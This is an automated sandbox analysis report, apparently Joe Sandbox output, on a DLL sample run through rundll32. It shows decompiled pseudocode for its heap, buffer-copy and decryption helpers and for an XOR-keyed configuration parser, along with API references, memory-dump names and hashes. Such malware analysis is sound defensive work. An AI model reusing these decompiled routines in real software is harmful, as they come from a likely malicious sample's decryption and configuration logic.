                                      • Opcode Fuzzy Hash: 42003dabf37f2c63d012fe47abc13cb8b0ee7db8ac1c01aa28ed6402cc1f15f6
                                      • Instruction Fuzzy Hash: AB016D76200109FFDB12EF46DC10EAA77ADEB44350F108169FA0996260E771FA85DB60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE4C73 Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E04DE4C73(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x4dea2d8, 0, _a4); // executed
				return _t2;
			}




                                      0x04de4c7f
                                      0x04de4c85

                                      APIs
                                      • RtlFreeHeap.NTDLL(00000000,00000000,04DE55C4,00000000,?,?,00000000), ref: 04DE4C7F
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: FreeHeap
                                      • String ID:
                                      • API String ID: 3298025750-0
                                      • Opcode ID: fe5d8c962a8cf1f5e66aa84af77e12c62506f7c172d12d7d15ea25c58742d197
                                      • Instruction ID: 611a25e4a7d0e2373ca845f74e26d782417c70c42e0b021fcf509bc26a6b84e7
                                      • Opcode Fuzzy Hash: fe5d8c962a8cf1f5e66aa84af77e12c62506f7c172d12d7d15ea25c58742d197
                                      • Instruction Fuzzy Hash: DAB012B1301200ABCB116B03DE24F057B21E790700F004010B3041837582360C20FB15
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE17E5 Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E04DE17E5(intOrPtr* __eax, void* __ecx, void* __edx, void* _a4, void** _a8) {
				void* _v8;
				int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v144;
				int _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				char _v164;
				void* _t37;
				void* _t42;
				void* _t51;
				int _t53;
				void* _t60;
				void* _t63;
				void* _t64;

				_t53 = 0;
				_t60 = __ecx;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				if(__ecx <= 0x80 ||  *__eax != 0x400) {
					L21:
					return _t53;
				} else {
					_t58 =  &_v164;
					_t37 = E04DE2F5B(__eax, __edx,  &_v164,  &_v16, _a4 + __ecx - 0x80);
					if(_t37 != 0) {
						goto L21;
					}
					_t61 = _t60 - 0x80;
					if(_v148 > _t60 - 0x80) {
						goto L21;
					}
					while( *((intOrPtr*)(_t64 + _t37 - 0x8c)) == _t53) {
						_t37 = _t37 + 1;
						if(_t37 < 0x10) {
							continue;
						}
						_t53 = _v148;
						_t51 = E04DE4DF6(_t53);
						_v8 = _t51;
						_t73 = _t51;
						if(_t51 != 0) {
							_t53 = 0;
							L18:
							if(_t53 != 0) {
								goto L21;
							}
							L19:
							if(_v8 != 0) {
								E04DE4C73(_v8);
							}
							goto L21;
						}
						memcpy(_t51, _a4, _t53);
						L8:
						_t63 = _v8;
						E04DE679A(_t58, _t73, _t63, _t53,  &_v32);
						if(_v32 != _v164 || _v28 != _v160 || _v24 != _v156 || _v20 != _v152) {
							L15:
							_t53 = 0;
							goto L19;
						} else {
							 *_a8 = _t63;
							goto L18;
						}
					}
					_t58 =  &_v144;
					_t42 = E04DE3072(_t61 & 0xfffffff0, 0,  &_v144, _a4,  &_v8,  &_v12); // executed
					__eflags = _t42;
					if(_t42 != 0) {
						_t53 = _v12;
						goto L18;
					}
					_t53 = _v148;
					__eflags = _v12 - _t53;
					if(__eflags >= 0) {
						goto L8;
					}
					goto L15;
				}
			}























                                      0x04de17f0
                                      0x04de17f3
                                      0x04de17fa
                                      0x04de17fd
                                      0x04de1800
                                      0x04de1805
                                      0x04de1901
                                      0x04de1905
                                      0x04de1817
                                      0x04de1823
                                      0x04de182a
                                      0x04de1831
                                      0x00000000
                                      0x00000000
                                      0x04de1837
                                      0x04de183f
                                      0x00000000
                                      0x00000000
                                      0x04de1845
                                      0x04de184e
                                      0x04de1852
                                      0x00000000
                                      0x00000000
                                      0x04de1854
                                      0x04de185b
                                      0x04de1860
                                      0x04de1863
                                      0x04de1865
                                      0x04de18e6
                                      0x04de18ed
                                      0x04de18ef
                                      0x00000000
                                      0x00000000
                                      0x04de18f1
                                      0x04de18f5
                                      0x04de18fa
                                      0x04de18fa
                                      0x00000000
                                      0x04de18f5
                                      0x04de186c
                                      0x04de1874
                                      0x04de1874
                                      0x04de187d
                                      0x04de188b
                                      0x04de18e2
                                      0x04de18e2
                                      0x00000000
                                      0x04de18ae
                                      0x04de18b1
                                      0x00000000
                                      0x04de18b1
                                      0x04de188b
                                      0x04de18c0
                                      0x04de18ce
                                      0x04de18d3
                                      0x04de18d5
                                      0x04de18ea
                                      0x00000000
                                      0x04de18ea
                                      0x04de18d7
                                      0x04de18dd
                                      0x04de18e0
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x04de18e0

                                      APIs
                                      • memcpy.NTDLL(00000000,?,?,?,?,04DE58B7,00000001,?,?,04DE58B7), ref: 04DE186C
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: memcpy
                                      • String ID:
                                      • API String ID: 3510742995-0
                                      • Opcode ID: eeb1230fe5a49d3e01f8d9271f8ab7622e43da6029275f198d82e6dbb559eb0b
                                      • Instruction ID: 314911ed662d18fb3b65036ce6137d396ed275137ce47a5aca93034adb843ee5
                                      • Opcode Fuzzy Hash: eeb1230fe5a49d3e01f8d9271f8ab7622e43da6029275f198d82e6dbb559eb0b
                                      • Instruction Fuzzy Hash: 2731EA72F00219BFEF25FEA6C8C0AFDB7B9BB04318F1045A9E555A7141D630AE46DB60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 02F11CD2 Relevance: 1.3, APIs: 1, Instructions: 86memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.568538445.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_2f10000_rundll32.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: dd415d2dbdb7d154c94c834763c5cb9e4d4232cf84615e1dc290bd74be3a31cd
                                      • Instruction ID: 0f5550ca1a0cebfa070ac41730a831449ea984a94561d8d753e6654975493835
                                      • Opcode Fuzzy Hash: dd415d2dbdb7d154c94c834763c5cb9e4d4232cf84615e1dc290bd74be3a31cd
                                      • Instruction Fuzzy Hash: 9D4113B49012068FDB04CFA8C5947AEBBF0FF48308F24856DD958AB351D37AA946CF91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE427E Relevance: 1.3, APIs: 1, Instructions: 43memoryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E04DE427E(intOrPtr* __edi, void* _a4, void* _a8, unsigned int _a12) {
				void* _t21;
				void* _t22;
				signed int _t24;
				intOrPtr* _t26;
				void* _t27;

				_t26 = __edi;
				if(_a4 == 0) {
					L2:
					_t27 = E04DE4E0B(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t27 == 0) {
						_t24 = _a12 >> 1;
						if(_t24 == 0) {
							_t27 = 2;
							HeapFree( *0x4dea2d8, 0, _a4);
						} else {
							_t21 = _a4;
							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
							 *_t26 = _t21;
						}
					}
					L6:
					return _t27;
				}
				_t22 = E04DE6D05(_a4, _a8, _a12, __edi); // executed
				_t27 = _t22;
				if(_t27 == 0) {
					goto L6;
				}
				goto L2;
			}








                                      0x04de427e
                                      0x04de4286
                                      0x04de429d
                                      0x04de42b8
                                      0x04de42bc
                                      0x04de42c1
                                      0x04de42c3
                                      0x04de42d5
                                      0x04de42e1
                                      0x04de42c5
                                      0x04de42c5
                                      0x04de42ca
                                      0x04de42cf
                                      0x04de42cf
                                      0x04de42c3
                                      0x04de42e7
                                      0x04de42eb
                                      0x04de42eb
                                      0x04de4292
                                      0x04de4297
                                      0x04de429b
                                      0x00000000
                                      0x00000000
                                      0x00000000

                                      APIs
                                        • Part of subcall function 04DE6D05: SysFreeString.OLEAUT32(00000000), ref: 04DE6D68
                                      • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,7705F710,?,00000000,?,00000000,?,04DE681F,?,004F0053,054A93D8,00000000,?), ref: 04DE42E1
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: Free$HeapString
                                      • String ID:
                                      • API String ID: 3806048269-0
                                      • Opcode ID: f4ecdfc22aff0d98f57a475a27f206244c05c840d9340a8b8f554eda2c30dfb5
                                      • Instruction ID: 21cc2b49eb9c92c8b638293046c725fdf3bdcd73c49e373a67cc67884467c637
                                      • Opcode Fuzzy Hash: f4ecdfc22aff0d98f57a475a27f206244c05c840d9340a8b8f554eda2c30dfb5
                                      • Instruction Fuzzy Hash: 0901FB36601619BBDF22AF96CC11EEE7B65FF44750F458028FE099A221D731E960DB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE723B Relevance: 1.3, APIs: 1, Instructions: 36stringCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 75%
                                      			E04DE723B(void* __ecx, void* __edx, void* _a4, void* _a8) {
				void* _t13;
				void* _t21;

				_t11 =  &_a4;
				_t21 = 0;
				__imp__( &_a8);
				_t13 = E04DE3072( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
				if(_t13 == 0) {
					_t21 = E04DE4DF6(_a8 + _a8);
					if(_t21 != 0) {
						E04DE1908(_a4, _t21, _t23);
					}
					E04DE4C73(_a4);
				}
				return _t21;
			}





                                      0x04de7243
                                      0x04de724a
                                      0x04de724c
                                      0x04de725b
                                      0x04de7262
                                      0x04de7271
                                      0x04de7275
                                      0x04de727c
                                      0x04de727c
                                      0x04de7284
                                      0x04de7289
                                      0x04de728e

                                      APIs
                                      • lstrlen.KERNEL32(?,?,?,00000000,?,04DE379D,00000000,?,?,?,04DE653D,?,054A95B0), ref: 04DE724C
                                        • Part of subcall function 04DE3072: CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000018,F0000000,?,00000110,04DE58B7), ref: 04DE30AA
                                        • Part of subcall function 04DE3072: memcpy.NTDLL(?,04DE58B7,00000010,?,?,?,?,?,?,?,?,?,?,04DE564C,00000000,04DE6D90), ref: 04DE30C3
                                        • Part of subcall function 04DE3072: CryptImportKey.ADVAPI32(00000000,?,0000001C,00000000,00000000,?), ref: 04DE30EC
                                        • Part of subcall function 04DE3072: CryptSetKeyParam.ADVAPI32(?,00000001,?,00000000), ref: 04DE3104
                                        • Part of subcall function 04DE3072: memcpy.NTDLL(00000000,04DE6D90,04DE58B7,0000011F), ref: 04DE3156
                                        • Part of subcall function 04DE4DF6: RtlAllocateHeap.NTDLL(00000000,00000000,04DE5522), ref: 04DE4E02
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
                                      • String ID:
                                      • API String ID: 894908221-0
                                      • Opcode ID: a651047afcd04cc9ac1b2849cf4cf11d2ae9afc1cf99d216d80729643c917f99
                                      • Instruction ID: 1087ce4d0b8c2072648004512ae615cf2acd44661d306785e06bacd00495a37a
                                      • Opcode Fuzzy Hash: a651047afcd04cc9ac1b2849cf4cf11d2ae9afc1cf99d216d80729643c917f99
                                      • Instruction Fuzzy Hash: B8F054762001087BEF11BE56DC04CFF3B6DEF85264B008011FD19CA110DA72E6559BB0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE3B76 Relevance: 1.3, APIs: 1, Instructions: 26stringCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E04DE3B76(intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr _a16, WCHAR* _a20) {
				void* _t17;

				if(_a4 == 0) {
					L2:
					return E04DE3BBE(_a8, 1, _a12, _a16, _a20, lstrlenW(_a20) + _t14 + 2);
				}
				_t17 = E04DE78E7(_a4, _a8, _a12, _a16, _a20); // executed
				if(_t17 != 0) {
					goto L2;
				}
				return _t17;
			}




                                      0x04de3b7e
                                      0x04de3b98
                                      0x00000000
                                      0x04de3bb4
                                      0x04de3b8f
                                      0x04de3b96
                                      0x00000000
                                      0x00000000
                                      0x04de3bbb

                                      APIs
                                      • lstrlenW.KERNEL32(?,?,?,04DE6FE9,3D04DE90,80000002,04DE2A82,04DE744C,74666F53,4D4C4B48,04DE744C,?,3D04DE90,80000002,04DE2A82,?), ref: 04DE3B9B
                                        • Part of subcall function 04DE78E7: SysAllocString.OLEAUT32(04DE744C), ref: 04DE7900
                                        • Part of subcall function 04DE78E7: SysFreeString.OLEAUT32(00000000), ref: 04DE7941
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: String$AllocFreelstrlen
                                      • String ID:
                                      • API String ID: 3808004451-0
                                      • Opcode ID: 3a43342eb04238db7bf6cec37716cfd030c52b195fac265d57d5b00a083b1a95
                                      • Instruction ID: 89b1a362d540a0ac83bfe72ef5cd55683fe09f2c31b37aab8b42dcc16ef43679
                                      • Opcode Fuzzy Hash: 3a43342eb04238db7bf6cec37716cfd030c52b195fac265d57d5b00a083b1a95
                                      • Instruction Fuzzy Hash: BCF07F3210020ABBDF066F92DC05EAA3B6AEB18354F048014BE1555160DB32D9B1EBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE6D7F Relevance: 1.3, APIs: 1, Instructions: 23COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E04DE6D7F(void* __edi, void* _a4) {
				int _t7;
				int _t12;

				_t7 = E04DE55D3(__edi, _a4,  &_a4); // executed
				_t12 = _t7;
				if(_t12 != 0) {
					memcpy(__edi, _a4, _t12);
					 *((char*)(__edi + _t12)) = 0;
					E04DE4C73(_a4);
				}
				return _t12;
			}





                                      0x04de6d8b
                                      0x04de6d90
                                      0x04de6d94
                                      0x04de6d9b
                                      0x04de6da6
                                      0x04de6daa
                                      0x04de6daa
                                      0x04de6db3

                                      APIs
                                        • Part of subcall function 04DE55D3: memcpy.NTDLL(00000000,00000110,?,?,?,?,04DE6D90,?,04DE58B7,04DE58B7,?), ref: 04DE5609
                                        • Part of subcall function 04DE55D3: memset.NTDLL ref: 04DE567F
                                        • Part of subcall function 04DE55D3: memset.NTDLL ref: 04DE5693
                                      • memcpy.NTDLL(?,04DE58B7,00000000,?,04DE58B7,04DE58B7,?,?,04DE58B7,?), ref: 04DE6D9B
                                        • Part of subcall function 04DE4C73: RtlFreeHeap.NTDLL(00000000,00000000,04DE55C4,00000000,?,?,00000000), ref: 04DE4C7F
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: memcpymemset$FreeHeap
                                      • String ID:
                                      • API String ID: 3053036209-0
                                      • Opcode ID: f5baabf818e55cf08db677d9f53549de5cca9e0683dc86cfcacb622431568ded
                                      • Instruction ID: 3bbaaa98bb67b5c7f2eac1af6d505cf75506be58944e44d7eb23ccf15ddd03ac
                                      • Opcode Fuzzy Hash: f5baabf818e55cf08db677d9f53549de5cca9e0683dc86cfcacb622431568ded
                                      • Instruction Fuzzy Hash: 7FE08C33A04528BBDB123A96DC00EFB7F5DDF556D4F044120FE088A214D631EA2093F2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Non-executed Functions

                                      Function 04DE475F Relevance: 12.3, APIs: 8, Instructions: 258memoryCOMMONCrypto
                                      Download Yara Rule
                                      C-Code - Quality: 93%
                                      			E04DE475F(void* __ebx, int* __ecx, void* __edi, void* __esi) {
				int _v8;
				void* _v12;
				void* _v16;
				signed int _t28;
				signed int _t33;
				signed int _t39;
				char* _t45;
				char* _t46;
				char* _t47;
				char* _t48;
				char* _t49;
				char* _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				intOrPtr _t54;
				void* _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				signed int _t61;
				intOrPtr _t64;
				signed int _t65;
				signed int _t70;
				void* _t72;
				void* _t73;
				signed int _t75;
				signed int _t78;
				signed int _t82;
				signed int _t86;
				signed int _t90;
				signed int _t94;
				signed int _t98;
				void* _t101;
				void* _t102;
				void* _t115;
				void* _t118;
				intOrPtr _t121;

				_t118 = __esi;
				_t115 = __edi;
				_t104 = __ecx;
				_t101 = __ebx;
				_t28 =  *0x4dea344; // 0x69b25f44
				if(E04DE4556( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
					 *0x4dea378 = _v8;
				}
				_t33 =  *0x4dea344; // 0x69b25f44
				if(E04DE4556( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
					_v12 = 2;
					L69:
					return _v12;
				}
				_t39 =  *0x4dea344; // 0x69b25f44
				_push(_t115);
				if(E04DE4556( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
					L67:
					HeapFree( *0x4dea2d8, 0, _v16);
					goto L69;
				} else {
					_push(_t101);
					_t102 = _v12;
					if(_t102 == 0) {
						_t45 = 0;
					} else {
						_t98 =  *0x4dea344; // 0x69b25f44
						_t45 = E04DE296E(_t104, _t102, _t98 ^ 0x7895433b);
					}
					_push(_t118);
					if(_t45 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x4dea2e0 = _v8;
						}
					}
					if(_t102 == 0) {
						_t46 = 0;
					} else {
						_t94 =  *0x4dea344; // 0x69b25f44
						_t46 = E04DE296E(_t104, _t102, _t94 ^ 0x219b08c7);
					}
					if(_t46 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x4dea2e4 = _v8;
						}
					}
					if(_t102 == 0) {
						_t47 = 0;
					} else {
						_t90 =  *0x4dea344; // 0x69b25f44
						_t47 = E04DE296E(_t104, _t102, _t90 ^ 0x31fc0661);
					}
					if(_t47 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x4dea2e8 = _v8;
						}
					}
					if(_t102 == 0) {
						_t48 = 0;
					} else {
						_t86 =  *0x4dea344; // 0x69b25f44
						_t48 = E04DE296E(_t104, _t102, _t86 ^ 0x0cd926ce);
					}
					if(_t48 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
							 *0x4dea004 = _v8;
						}
					}
					if(_t102 == 0) {
						_t49 = 0;
					} else {
						_t82 =  *0x4dea344; // 0x69b25f44
						_t49 = E04DE296E(_t104, _t102, _t82 ^ 0x3cd8b2cb);
					}
					if(_t49 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
							 *0x4dea02c = _v8;
						}
					}
					if(_t102 == 0) {
						_t50 = 0;
					} else {
						_t78 =  *0x4dea344; // 0x69b25f44
						_t50 = E04DE296E(_t104, _t102, _t78 ^ 0x2878b929);
					}
					if(_t50 == 0) {
						L41:
						 *0x4dea2ec = 5;
						goto L42;
					} else {
						_t104 =  &_v8;
						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
							goto L41;
						} else {
							L42:
							if(_t102 == 0) {
								_t51 = 0;
							} else {
								_t75 =  *0x4dea344; // 0x69b25f44
								_t51 = E04DE296E(_t104, _t102, _t75 ^ 0x261a367a);
							}
							if(_t51 != 0) {
								_push(_t51);
								_t72 = 0x10;
								_t73 = E04DE3A24(_t72);
								if(_t73 != 0) {
									_push(_t73);
									E04DE3F7E();
								}
							}
							if(_t102 == 0) {
								_t52 = 0;
							} else {
								_t70 =  *0x4dea344; // 0x69b25f44
								_t52 = E04DE296E(_t104, _t102, _t70 ^ 0xb9d404b2);
							}
							if(_t52 != 0 && E04DE3A24(0, _t52) != 0) {
								_t121 =  *0x4dea3cc; // 0x54a95b0
								E04DE68F5(_t121 + 4, _t68);
							}
							if(_t102 == 0) {
								_t53 = 0;
							} else {
								_t65 =  *0x4dea344; // 0x69b25f44
								_t53 = E04DE296E(_t104, _t102, _t65 ^ 0x3df17130);
							}
							if(_t53 == 0) {
								L59:
								_t54 =  *0x4dea348; // 0x6bd5a8
								_t22 = _t54 + 0x4deb252; // 0x616d692f
								 *0x4dea374 = _t22;
								goto L60;
							} else {
								_t64 = E04DE3A24(0, _t53);
								 *0x4dea374 = _t64;
								if(_t64 != 0) {
									L60:
									if(_t102 == 0) {
										_t56 = 0;
									} else {
										_t61 =  *0x4dea344; // 0x69b25f44
										_t56 = E04DE296E(_t104, _t102, _t61 ^ 0xd2079859);
									}
									if(_t56 == 0) {
										_t57 =  *0x4dea348; // 0x6bd5a8
										_t23 = _t57 + 0x4deb791; // 0x6976612e
										_t58 = _t23;
									} else {
										_t58 = E04DE3A24(0, _t56);
									}
									 *0x4dea3e0 = _t58;
									HeapFree( *0x4dea2d8, 0, _t102);
									_v12 = 0;
									goto L67;
								}
								goto L59;
							}
						}
					}
				}
			}








































                                      0x04de475f
                                      0x04de475f
                                      0x04de475f
                                      0x04de475f
                                      0x04de4762
                                      0x04de477f
                                      0x04de478d
                                      0x04de478d
                                      0x04de4792
                                      0x04de47ac
                                      0x04de4a1a
                                      0x04de4a21
                                      0x04de4a25
                                      0x04de4a25
                                      0x04de47b2
                                      0x04de47b7
                                      0x04de47cf
                                      0x04de4a07
                                      0x04de4a11
                                      0x00000000
                                      0x04de47d5
                                      0x04de47d5
                                      0x04de47d6
                                      0x04de47db
                                      0x04de47f1
                                      0x04de47dd
                                      0x04de47dd
                                      0x04de47ea
                                      0x04de47ea
                                      0x04de47f3
                                      0x04de47fc
                                      0x04de47fe
                                      0x04de4808
                                      0x04de480d
                                      0x04de480d
                                      0x04de4808
                                      0x04de4814
                                      0x04de482a
                                      0x04de4816
                                      0x04de4816
                                      0x04de4823
                                      0x04de4823
                                      0x04de482e
                                      0x04de4830
                                      0x04de483a
                                      0x04de483f
                                      0x04de483f
                                      0x04de483a
                                      0x04de4846
                                      0x04de485c
                                      0x04de4848
                                      0x04de4848
                                      0x04de4855
                                      0x04de4855
                                      0x04de4860
                                      0x04de4862
                                      0x04de486c
                                      0x04de4871
                                      0x04de4871
                                      0x04de486c
                                      0x04de4878
                                      0x04de488e
                                      0x04de487a
                                      0x04de487a
                                      0x04de4887
                                      0x04de4887
                                      0x04de4892
                                      0x04de4894
                                      0x04de489e
                                      0x04de48a3
                                      0x04de48a3
                                      0x04de489e
                                      0x04de48aa
                                      0x04de48c0
                                      0x04de48ac
                                      0x04de48ac
                                      0x04de48b9
                                      0x04de48b9
                                      0x04de48c4
                                      0x04de48c6
                                      0x04de48d0
                                      0x04de48d5
                                      0x04de48d5
                                      0x04de48d0
                                      0x04de48dc
                                      0x04de48f2
                                      0x04de48de
                                      0x04de48de
                                      0x04de48eb
                                      0x04de48eb
                                      0x04de48f6
                                      0x04de4909
                                      0x04de4909
                                      0x00000000
                                      0x04de48f8
                                      0x04de48f8
                                      0x04de4902
                                      0x00000000
                                      0x04de4913
                                      0x04de4913
                                      0x04de4915
                                      0x04de492b
                                      0x04de4917
                                      0x04de4917
                                      0x04de4924
                                      0x04de4924
                                      0x04de492f
                                      0x04de4931
                                      0x04de4934
                                      0x04de4935
                                      0x04de493c
                                      0x04de493e
                                      0x04de493f
                                      0x04de493f
                                      0x04de493c
                                      0x04de4946
                                      0x04de495c
                                      0x04de4948
                                      0x04de4948
                                      0x04de4955
                                      0x04de4955
                                      0x04de4960
                                      0x04de496e
                                      0x04de4978
                                      0x04de4978
                                      0x04de4980
                                      0x04de4996
                                      0x04de4982
                                      0x04de4982
                                      0x04de498f
                                      0x04de498f
                                      0x04de499a
                                      0x04de49ad
                                      0x04de49ad
                                      0x04de49b2
                                      0x04de49b8
                                      0x00000000
                                      0x04de499c
                                      0x04de499f
                                      0x04de49a4
                                      0x04de49ab
                                      0x04de49bd
                                      0x04de49bf
                                      0x04de49d5
                                      0x04de49c1
                                      0x04de49c1
                                      0x04de49ce
                                      0x04de49ce
                                      0x04de49d9
                                      0x04de49e5
                                      0x04de49ea
                                      0x04de49ea
                                      0x04de49db
                                      0x04de49de
                                      0x04de49de
                                      0x04de49f8
                                      0x04de49fd
                                      0x04de4a03
                                      0x00000000
                                      0x04de4a06
                                      0x00000000
                                      0x04de49ab
                                      0x04de499a
                                      0x04de4902
                                      0x04de48f6

                                      APIs
                                      • StrToIntExA.SHLWAPI(00000000,00000000,?,04DEA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04DE4804
                                      • StrToIntExA.SHLWAPI(00000000,00000000,?,04DEA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04DE4836
                                      • StrToIntExA.SHLWAPI(00000000,00000000,?,04DEA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04DE4868
                                      • StrToIntExA.SHLWAPI(00000000,00000000,?,04DEA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04DE489A
                                      • StrToIntExA.SHLWAPI(00000000,00000000,?,04DEA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04DE48CC
                                      • StrToIntExA.SHLWAPI(00000000,00000000,?,04DEA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04DE48FE
                                      • HeapFree.KERNEL32(00000000,?,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 04DE49FD
